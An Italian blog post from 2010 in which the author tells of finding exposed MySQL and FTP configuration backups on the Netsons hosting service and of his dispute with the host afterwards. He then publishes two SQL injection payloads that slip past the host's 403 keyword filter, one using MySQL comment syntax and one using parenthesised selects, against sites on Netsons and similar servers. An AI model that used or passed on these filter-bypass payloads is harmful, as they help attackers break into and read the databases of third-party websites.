to be reflective?
RLY? Trasgression… make things in the right way.
11.15.2010
Netsons – 403 Forbidden ERROR? No! Permitted SQL injection (bypass)

Error 403 Forbidden Bypass

C’è sempre STATO, tra me e l’ HOSTING, un rapporto d’ amore e d’ odio.
Alcuni mesi fa, aprii uno spazio WEB FREE, nei loro domini, e provai a controllare la sicurezza del LUOGO che mi ospitava. Come si fa , quando si va in un albergo, e si controlla il letto, il bagno e le altre 2 / 3 cosette.
In 15 minuti, mi accorsi che potevo NAVIGARE nel filesystem del SERVER a MIO PIACERE, ma cosa più assurda, NOTAI la presenza di alcune DIRECTORY montate ESTERNAMENTE, completamente leggibili che contenevano i BACKUP completi dei file di configurazione del MYSQL e dell’ FTP di tutti i siti presenti all’ interno del SERVER.

Poichè ETICAMENTE non mi sentivo e non mi sento SIMILE alla FRANZONI del delitto di COGNE, mi rivolsi, insieme ad un mio amico (THE_STOOGE), agli amministatori di NETSONS ed in cambio ricevetti un GRAZIE ed un regalo:
un HOSTING DEDICATO.
Alcuni giorni dopo, in seguito alla pubblicazione del fatto in alcuni BLOG, i suddetti amministratori preferirono passare dai ringraziamenti alle minacce di denuncia per diffamazione (DIFFAMAZIONE DI CHE?) e provvederono a RITIRARE il GRAZIE e il DEDICATO, lasciandomi con il Jägermeister in bocca. Ma in fin dei conti, AMEN

Dopo questa storia, HO AVUTO modo di constatare come NETSONS abbia aumentato notevolemente la PROTEZIONE e la SICUREZZA del loro domini ed una caratteristica che li contraddistingue ora è la SEGUENTE:

Quando si tenta di EFFETTUARE una SQL INJECTION su un blog o sito presente sui loro server, l’ immissione di comandi o parole vietate viene bloccata in questo modo:

Example:
www.sito_vulnerabile.netsons.org/leggi.php?id=-1%20union%20select%201,2,3,4,5,6,7–

Per farla BREVE e concisa quindi, qui di seguito vi POSTO due esempi di QUERY SQL , trovate da me ed HACKU googlando e SMANETTANDO, che bypasseranno questo blocco sui server NETSONS e su altri in cui si manifesta QUESTA RESTRIZIONE.

FIRST CODE:

    leggi.php?id=-1%20/*!union*/%20select%201,2,3,4,5,6,7–

(includendo i comandi SQL tra /*! …. */ )

SECOND CODE:

    leggi.php?id=-1 union (select 1,version(),2,4,5,6,7)--

(includendo la select tra parentesi())

Enjoy, no LAMING

BlogItalia - La directory italiana dei bloghttp://www.wikio.itAggregatore notizie RSSAggregatore di blogAggregatore di blog

Comments are closed.